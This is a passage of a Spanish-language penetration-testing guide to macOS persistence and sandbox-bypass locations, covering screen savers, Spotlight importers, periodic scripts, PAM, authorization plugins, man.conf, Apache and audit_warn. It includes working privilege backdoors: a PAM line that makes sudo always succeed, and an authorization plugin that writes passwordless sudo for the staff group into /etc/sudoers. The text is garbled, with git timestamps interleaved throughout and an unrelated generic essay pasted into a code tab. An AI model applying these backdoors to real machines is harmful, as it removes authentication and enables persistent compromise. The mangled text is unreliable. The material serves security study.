* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
2024-01-10 06:28:19 +00:00
* `/System/Library/Screen Savers`
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
* **Desencadenar**: Seleccionar el protector de pantalla
2023-09-28 19:22:43 +00:00
* `/Library/Screen Savers`
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
* **Desencadenar**: Seleccionar el protector de pantalla
2023-09-28 19:22:43 +00:00
* `~/Library/Screen Savers`
2024-02-07 05:32:25 +00:00
* **Desencadenar**: Seleccionar el protector de pantalla
2023-09-28 19:22:43 +00:00
2024-01-10 06:28:19 +00:00
< figure > < img src = "../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" width = "375" > < figcaption > < / figcaption > < / figure >
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Crea un nuevo proyecto en Xcode y selecciona la plantilla para generar un nuevo **Protector de pantalla** . Luego, agrega tu código, por ejemplo el siguiente código para generar registros.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
**Compílalo** y copia el paquete `.saver` a ** `~/Library/Screen Savers` **. Luego, abre la GUI del Protector de pantalla y si haces clic en él, debería generar muchos registros:
2023-09-28 19:22:43 +00:00
{% code overflow="wrap" %}
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
Timestamp (process)[PID]
2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char ** )
2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
```
{% endcode %}
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Ten en cuenta que debido a que dentro de los permisos del binario que carga este código (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) puedes encontrar ** `com.apple.security.app-sandbox` ** estarás **dentro del sandbox de la aplicación común** .
2023-09-28 19:22:43 +00:00
{% endhint %}
2024-02-07 05:32:25 +00:00
Código del protector de pantalla:
2023-09-28 19:22:43 +00:00
```objectivec
//
// ScreenSaverExampleView.m
// ScreenSaverExample
//
// Created by Carlos Polop on 27/9/23.
//
#import "ScreenSaverExampleView.h"
@implementation ScreenSaverExampleView
- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}
- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super startAnimation];
}
- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super stopAnimation];
}
- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super drawRect:rect];
}
- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return;
}
- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return NO;
}
2023-06-05 18:30:03 +00:00
2023-09-28 19:22:43 +00:00
- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return nil;
}
__attribute__((constructor))
2023-09-28 20:19:13 +00:00
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
2023-06-05 18:30:03 +00:00
}
2023-09-28 20:19:13 +00:00
@end
2023-06-05 18:30:03 +00:00
```
2024-02-07 05:32:25 +00:00
### Plugins de Spotlight
2023-09-28 19:22:43 +00:00
2023-12-30 01:04:30 +00:00
writeup: [https://theevilbit.github.io/beyond/beyond\_0011/ ](https://theevilbit.github.io/beyond/beyond\_0011/ )
2023-10-01 18:11:55 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-10-01 18:11:55 +00:00
* Pero terminarás en un sandbox de aplicación
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-12-30 01:04:30 +00:00
* El sandbox parece muy limitado
2023-10-01 18:11:55 +00:00
#### Ubicación
* `~/Library/Spotlight/`
2024-02-07 05:32:25 +00:00
* **Disparador**: Se crea un nuevo archivo con una extensión gestionada por el plugin de Spotlight.
2023-10-01 18:11:55 +00:00
* `/Library/Spotlight/`
2024-02-07 05:32:25 +00:00
* **Disparador**: Se crea un nuevo archivo con una extensión gestionada por el plugin de Spotlight.
* Se requiere permisos de root
2023-10-01 18:11:55 +00:00
* `/System/Library/Spotlight/`
2024-02-07 05:32:25 +00:00
* **Disparador**: Se crea un nuevo archivo con una extensión gestionada por el plugin de Spotlight.
* Se requiere permisos de root
2023-10-01 18:11:55 +00:00
* `Some.app/Contents/Library/Spotlight/`
2024-02-07 05:32:25 +00:00
* **Disparador**: Se crea un nuevo archivo con una extensión gestionada por el plugin de Spotlight.
2023-10-01 18:11:55 +00:00
* Se requiere una nueva aplicación
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-10-01 18:11:55 +00:00
2024-02-13 00:50:14 +00:00
Spotlight es la función de búsqueda integrada de macOS, diseñada para proporcionar a los usuarios un acceso rápido y completo a los datos en sus computadoras.\
Para facilitar esta capacidad de búsqueda rápida, Spotlight mantiene una base de datos **propia** y crea un índice al **analizar la mayoría de los archivos** , lo que permite búsquedas rápidas tanto por nombres de archivo como por su contenido.
2023-10-01 18:11:55 +00:00
2024-02-08 22:25:00 +00:00
El mecanismo subyacente de Spotlight implica un proceso central llamado 'mds', que significa ** 'servidor de metadatos'**. Este proceso orquesta todo el servicio de Spotlight. Complementariamente, existen múltiples demonios 'mdworker' que realizan una variedad de tareas de mantenimiento, como indexar diferentes tipos de archivos (`ps -ef | grep mdworker`). Estas tareas son posibles a través de plugins importadores de Spotlight, o **paquetes ".mdimporter"** , que permiten a Spotlight comprender e indexar contenido en una amplia gama de formatos de archivo.
2023-10-01 18:11:55 +00:00
2024-02-08 22:25:00 +00:00
Los plugins o **paquetes `.mdimporter`** se encuentran en los lugares mencionados anteriormente y si aparece un nuevo paquete, se carga en cuestión de minutos (no es necesario reiniciar ningún servicio). Estos paquetes deben indicar qué **tipo de archivo y extensiones pueden gestionar** , de esta manera, Spotlight los utilizará cuando se cree un nuevo archivo con la extensión indicada.
2023-10-01 18:11:55 +00:00
2023-12-26 02:09:27 +00:00
Es posible **encontrar todos los `mdimporters`** cargados ejecutando:
2023-10-01 18:11:55 +00:00
```bash
mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
```
2024-02-07 05:32:25 +00:00
Y por ejemplo ** /Library/Spotlight/iBooksAuthor.mdimporter** se utiliza para analizar este tipo de archivos (extensiones `.iba` y `.book` entre otros):
2023-10-01 18:11:55 +00:00
```json
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]
```
2023-09-28 19:22:43 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Si revisas el Plist de otros `mdimporter` , es posible que no encuentres la entrada ** `UTTypeConformsTo` **. Esto se debe a que es un _Identificador de Tipo Uniforme_ ([UTI](https://en.wikipedia.org/wiki/Uniform_Type_Identifier)) integrado y no necesita especificar extensiones.
2023-10-01 18:11:55 +00:00
2024-02-07 05:32:25 +00:00
Además, los complementos predeterminados del sistema siempre tienen prioridad, por lo que un atacante solo puede acceder a archivos que no estén indexados por los propios `mdimporters` de Apple.
2023-10-01 18:11:55 +00:00
{% endhint %}
2024-02-13 00:50:14 +00:00
Para crear tu propio importador, podrías comenzar con este proyecto: [https://github.com/megrimm/pd-spotlight-importer ](https://github.com/megrimm/pd-spotlight-importer ) y luego cambiar el nombre, los ** `CFBundleDocumentTypes` ** y agregar ** `UTImportedTypeDeclarations` ** para que admita la extensión que deseas y reflejarlos en ** `schema.xml` **.\
2024-02-07 05:32:25 +00:00
Luego **cambia** el código de la función ** `GetMetadataForFile` ** para ejecutar tu carga útil cuando se cree un archivo con la extensión procesada.
2023-10-01 18:11:55 +00:00
2024-02-13 00:50:14 +00:00
Finalmente, **compila y copia tu nuevo `.mdimporter`** en una de las ubicaciones anteriores y puedes verificar cuándo se carga **monitoreando los registros** o verificando ** `mdimport -L.` **
2023-10-01 18:11:55 +00:00
2023-12-26 02:09:27 +00:00
### ~~Panel de Preferencias~~
2023-10-01 18:11:55 +00:00
{% hint style="danger" %}
2023-12-26 02:09:27 +00:00
Parece que esto ya no funciona.
2023-09-28 19:22:43 +00:00
{% endhint %}
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0009/ ](https://theevilbit.github.io/beyond/beyond\_0009/ )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
* Requiere una acción de usuario específica
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* **`/System/Library/PreferencePanes`**
* **`/Library/PreferencePanes`**
* **`~/Library/PreferencePanes`**
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Descripción
2023-12-26 02:09:27 +00:00
Parece que esto ya no funciona.
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
## Bypass de Sandbox de Root
2023-09-28 20:19:13 +00:00
{% hint style="success" %}
2024-02-07 05:32:25 +00:00
Aquí puedes encontrar ubicaciones de inicio útiles para **bypass de sandbox** que te permiten simplemente ejecutar algo al **escribirlo en un archivo** siendo **root** y/o requiriendo otras **condiciones extrañas.**
2023-09-28 20:19:13 +00:00
{% endhint %}
### Periódico
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0019/ ](https://theevilbit.github.io/beyond/beyond\_0019/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 20:19:13 +00:00
* Pero necesitas ser root
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicación
* `/etc/periodic/daily` , `/etc/periodic/weekly` , `/etc/periodic/monthly` , `/usr/local/etc/periodic`
2024-02-07 05:32:25 +00:00
* Se requiere ser root
2024-02-08 22:25:00 +00:00
* **Disparador**: Cuando llega el momento
2023-09-28 20:19:13 +00:00
* `/etc/daily.local` , `/etc/weekly.local` o `/etc/monthly.local`
2024-02-07 05:32:25 +00:00
* Se requiere ser root
2024-02-08 22:25:00 +00:00
* **Disparador**: Cuando llega el momento
2023-09-28 20:19:13 +00:00
2023-10-01 18:11:55 +00:00
#### Descripción y Explotación
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Los scripts periódicos (**`/etc/periodic`**) se ejecutan debido a los **launch daemons** configurados en `/System/Library/LaunchDaemons/com.apple.periodic*` . Ten en cuenta que los scripts almacenados en `/etc/periodic/` se ejecutan como el **propietario del archivo** , por lo que esto no funcionará para una posible escalada de privilegios.
2024-02-13 00:50:14 +00:00
{% code overflow="wrap" %}
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
/etc/periodic/daily:
total 72
-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
[...]
/etc/periodic/monthly:
total 24
-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
/etc/periodic/weekly:
total 8
-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
2023-09-28 19:22:43 +00:00
```
2024-02-07 05:32:25 +00:00
{% endcode %}
2023-12-26 02:09:27 +00:00
Hay otros scripts periódicos que se ejecutarán indicados en ** `/etc/defaults/periodic.conf` **:
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local" # Local scripts
weekly_local="/etc/weekly.local" # Local scripts
monthly_local="/etc/monthly.local" # Local scripts
2023-06-05 18:30:03 +00:00
```
2024-02-08 22:25:00 +00:00
Si logras escribir alguno de los archivos `/etc/daily.local` , `/etc/weekly.local` o `/etc/monthly.local` , se **ejecutará tarde o temprano** .
2023-11-02 17:51:22 +00:00
{% hint style="warning" %}
2024-02-08 22:25:00 +00:00
Ten en cuenta que el script periódico se **ejecutará como el propietario del script** . Por lo tanto, si un usuario regular es el propietario del script, se ejecutará como ese usuario (esto podría prevenir ataques de escalada de privilegios).
2023-11-02 17:51:22 +00:00
{% endhint %}
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
### PAM
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Explicación: [Linux Hacktricks PAM ](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md )\
Explicación: [https://theevilbit.github.io/beyond/beyond\_0005/ ](https://theevilbit.github.io/beyond/beyond\_0005/ )
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 20:19:13 +00:00
* Pero necesitas ser root
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-06-05 18:30:03 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
* Siempre se requiere ser root
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
Dado que PAM se enfoca más en la **persistencia** y en el malware que en la ejecución sencilla dentro de macOS, este blog no proporcionará una explicación detallada, **lee las explicaciones para entender mejor esta técnica** .
2023-11-02 17:51:22 +00:00
2024-02-07 05:32:25 +00:00
Verifica los módulos de PAM con:
2023-11-02 17:51:22 +00:00
```bash
ls -l /etc/pam.d
```
2024-02-07 05:32:25 +00:00
Una técnica de persistencia/escalada de privilegios que abusa de PAM es tan fácil como modificar el módulo /etc/pam.d/sudo agregando al principio la línea:
2023-11-02 17:51:22 +00:00
```bash
auth sufficient pam_permit.so
```
2024-02-13 00:50:14 +00:00
Por lo tanto, **se verá** algo así:
2023-11-02 17:51:22 +00:00
```bash
# sudo: auth account password session
auth sufficient pam_permit.so
auth include sudo_local
auth sufficient pam_smartcard.so
auth required pam_opendirectory.so
account required pam_permit.so
password required pam_deny.so
session required pam_permit.so
```
2024-02-07 05:32:25 +00:00
Y, por lo tanto, cualquier intento de usar ** `sudo` funcionará**.
2023-11-02 17:51:22 +00:00
{% hint style="danger" %}
2024-02-13 00:50:14 +00:00
Tenga en cuenta que este directorio está protegido por TCC, por lo que es muy probable que el usuario reciba una solicitud pidiendo acceso.
2023-11-02 17:51:22 +00:00
{% endhint %}
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
### Plugins de Autorización
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )\
Descripción: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 ](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 20:19:13 +00:00
* Pero necesitas ser root y hacer configuraciones adicionales
2023-12-30 01:04:30 +00:00
* Bypass de TCC: ???
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* `/Library/Security/SecurityAgentPlugins/`
2024-02-07 05:32:25 +00:00
* Se requiere ser root
2023-09-28 20:19:13 +00:00
* También es necesario configurar la base de datos de autorización para usar el plugin
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Puedes crear un plugin de autorización que se ejecutará cuando un usuario inicie sesión para mantener la persistencia. Para obtener más información sobre cómo crear uno de estos plugins, consulta las descripciones anteriores (y ten cuidado, uno mal escrito puede bloquearte y necesitarás limpiar tu Mac desde el modo de recuperación).
2023-11-03 11:57:42 +00:00
```objectivec
// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
#import <Foundation/Foundation.h>
__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}
```
2024-02-07 05:32:25 +00:00
**Mueva** el paquete a la ubicación para que se cargue:
2023-11-03 11:57:42 +00:00
```bash
cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
```
2024-02-13 00:50:14 +00:00
Finalmente agregar la **regla** para cargar este Plugin:
2023-11-03 11:57:42 +00:00
```bash
cat > /tmp/rule.plist < < EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > class< / key >
< string > evaluate-mechanisms< / string >
< key > mechanisms< / key >
< array >
< string > CustomAuth:login,privileged< / string >
< / array >
< / dict >
< / plist >
EOF
security authorizationdb write com.asdf.asdf < /tmp/rule.plist
```
2024-02-13 00:50:14 +00:00
El comando ** `evaluate-mechanisms` ** indicará al marco de autorización que necesitará **llamar a un mecanismo externo para la autorización** . Además, ** `privileged` ** hará que se ejecute como root.
2023-12-16 14:31:06 +00:00
2023-11-03 11:57:42 +00:00
Actívalo con:
```bash
security authorize com.asdf.asdf
```
2024-02-13 00:50:14 +00:00
Y luego el grupo **staff debe tener acceso sudo** (leer `/etc/sudoers` para confirmar).
2023-09-28 19:22:43 +00:00
### Man.conf
2024-02-07 05:32:25 +00:00
Explicación: [https://theevilbit.github.io/beyond/beyond\_0030/ ](https://theevilbit.github.io/beyond/beyond\_0030/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 20:19:13 +00:00
* Pero necesitas ser root y el usuario debe usar man
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 19:22:43 +00:00
#### Ubicación
* **`/private/etc/man.conf`**
2024-02-07 05:32:25 +00:00
* Se requiere ser root
* **`/private/etc/man.conf`**: Cada vez que se use man
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
El archivo de configuración ** `/private/etc/man.conf` ** indica el binario/script a utilizar al abrir archivos de documentación de man. Por lo tanto, la ruta al ejecutable podría ser modificada para que cada vez que el usuario use man para leer algunos documentos, se ejecute una puerta trasera.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Por ejemplo, establecido en ** `/private/etc/man.conf` **:
2023-09-28 19:22:43 +00:00
```
MANPAGER /tmp/view
```
2024-02-13 00:50:14 +00:00
Y luego crea `/tmp/view` como:
2023-09-28 19:22:43 +00:00
```bash
#!/bin/zsh
touch /tmp/manconf
/usr/bin/less -s
```
2023-09-28 20:19:13 +00:00
### Apache2
2023-09-26 23:44:22 +00:00
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
2023-09-26 23:44:22 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
* Pero necesitas ser root y que apache esté en ejecución
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
* Httpd no tiene permisos
2023-09-26 23:44:22 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicación
2023-09-26 23:44:22 +00:00
2023-09-28 20:19:13 +00:00
* **`/etc/apache2/httpd.conf`**
2024-02-07 05:32:25 +00:00
* Se requiere ser root
* Desencadenante: Cuando se inicia Apache2
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Puedes indicar en `/etc/apache2/httpd.conf` que cargue un módulo agregando una línea como esta:
{% code overflow="wrap" %}
2023-09-26 23:44:22 +00:00
```bash
2023-09-28 20:19:13 +00:00
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
2023-09-26 23:44:22 +00:00
```
2023-09-28 20:19:13 +00:00
{% endcode %}
2023-09-26 23:44:22 +00:00
2024-02-07 05:32:25 +00:00
De esta manera, tus módulos compilados serán cargados por Apache. La única condición es que necesitas **firmarlo con un certificado válido de Apple** , o necesitas **agregar un nuevo certificado de confianza** en el sistema y **firmarlo** con él.
2023-09-28 19:22:43 +00:00
2024-02-08 22:25:00 +00:00
Luego, si es necesario, para asegurarte de que el servidor se iniciará, podrías ejecutar:
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```
2024-02-07 05:32:25 +00:00
Ejemplo de código para el Dylb:
2023-09-28 20:19:13 +00:00
```objectivec
#include <stdio.h>
#include <syslog.h>
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}
2023-09-28 19:22:43 +00:00
```
2023-09-28 20:19:13 +00:00
### Marco de auditoría BSM
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0031/ ](https://theevilbit.github.io/beyond/beyond\_0031/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [🟠 ](https://emojipedia.org/large-orange-circle )
* Pero necesitas ser root, que auditd esté en ejecución y causar una advertencia
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
#### Ubicación
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
* **`/etc/security/audit_warn`**
2024-02-07 05:32:25 +00:00
* Se requiere ser root
* **Desencadenante**: Cuando auditd detecta una advertencia
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
#### Descripción y Exploit
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
Cada vez que auditd detecta una advertencia, se **ejecuta** el script ** `/etc/security/audit_warn` **. Por lo tanto, podrías agregar tu carga útil en él.
2023-06-05 18:30:03 +00:00
```bash
2023-09-28 20:19:13 +00:00
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
2023-06-05 18:30:03 +00:00
```
2024-02-13 00:50:14 +00:00
Puedes forzar una advertencia con `sudo audit -n` .
### Elementos de inicio
2023-06-05 18:30:03 +00:00
2023-09-26 23:44:22 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
**Esto está obsoleto, por lo que no debería encontrarse nada en esos directorios.**
2023-09-26 23:44:22 +00:00
{% endhint %}
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
El directorio **StartupItem** debe estar ubicado dentro de `/Library/StartupItems/` o `/System/Library/StartupItems/` . Una vez establecido este directorio, debe contener dos archivos específicos:
1. Un **script rc** : Un script de shell ejecutado al inicio.
2. Un archivo **plist** , específicamente nombrado `StartupParameters.plist` , que contiene varias configuraciones.
Asegúrate de que tanto el script rc como el archivo `StartupParameters.plist` estén ubicados correctamente dentro del directorio **StartupItem** para que el proceso de inicio los reconozca y los utilice.
2023-06-05 18:30:03 +00:00
2023-09-26 23:44:22 +00:00
{% tabs %}
{% tab title="StartupParameters.plist" %}
2023-06-05 18:30:03 +00:00
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-09-26 23:44:22 +00:00
< key > Description< / key >
< string > This is a description of this service< / string >
< key > OrderPreference< / key >
< string > None< / string > <!-- Other req services to execute before this -->
< key > Provides< / key >
< array >
< string > superservicename< / string > <!-- Name of the services provided by this file -->
< / array >
2023-06-05 18:30:03 +00:00
< / dict >
< / plist >
```
2023-12-26 02:09:27 +00:00
{% endtab %}
2024-02-07 05:32:25 +00:00
{% tab title="superservicename" %}
### Ubicaciones de inicio automático de macOS
#### Introducción
2024-02-13 00:50:14 +00:00
En macOS, hay varias ubicaciones donde se pueden configurar aplicaciones para que se inicien automáticamente al iniciar sesión. Estas ubicaciones son útiles para los usuarios, pero también pueden ser aprovechadas por los atacantes para ejecutar malware de forma persistente en un sistema comprometido.
2024-02-07 05:32:25 +00:00
#### Ubicaciones de inicio automático
2024-02-13 00:50:14 +00:00
1. **LaunchAgents** : Estas son configuraciones a nivel de usuario que se aplican cuando un usuario inicia sesión. Se encuentran en `~/Library/LaunchAgents/` .
2. **LaunchDaemons** : Estas son configuraciones a nivel de sistema que se aplican cuando se inicia el sistema. Se encuentran en `/Library/LaunchDaemons/` .
2024-02-07 05:32:25 +00:00
2024-02-13 00:50:14 +00:00
3. **Login Items** : Estas son aplicaciones o scripts que se inician cuando un usuario inicia sesión. Se pueden encontrar en Preferencias del Sistema > Usuarios y Grupos > Elementos de inicio.
2024-02-07 05:32:25 +00:00
2024-02-13 00:50:14 +00:00
#### Verificación y eliminación
2024-02-07 05:32:25 +00:00
2024-02-13 00:50:14 +00:00
Es importante revisar regularmente estas ubicaciones para detectar y eliminar cualquier aplicación no deseada que se esté iniciando automáticamente en el sistema. Esto puede ayudar a prevenir la ejecución de malware y a mantener la seguridad del sistema.
2024-02-07 05:32:25 +00:00
2024-02-13 00:50:14 +00:00
#### Conclusión
2024-02-07 05:32:25 +00:00
2024-02-13 00:50:14 +00:00
Al conocer las ubicaciones de inicio automático en macOS y cómo verificar y eliminar las aplicaciones no deseadas, los usuarios pueden mejorar la seguridad de sus sistemas y prevenir posibles ataques de malware. Es importante mantenerse informado sobre las mejores prácticas de seguridad en macOS para protegerse de posibles amenazas.
2024-02-07 05:32:25 +00:00
{% endtab %}
2023-06-05 18:30:03 +00:00
```bash
#!/bin/sh
. /etc/rc.common
StartService(){
2023-09-26 23:44:22 +00:00
touch /tmp/superservicestarted
2023-06-05 18:30:03 +00:00
}
StopService(){
2023-09-26 23:44:22 +00:00
rm /tmp/superservicestarted
2023-06-05 18:30:03 +00:00
}
RestartService(){
2023-09-26 23:44:22 +00:00
echo "Restarting"
2023-06-05 18:30:03 +00:00
}
RunService "$1"
```
2024-02-13 00:50:14 +00:00
{% endtab %}
{% endtabs %}
2023-12-26 02:09:27 +00:00
### ~~emond~~
2023-09-28 20:19:13 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
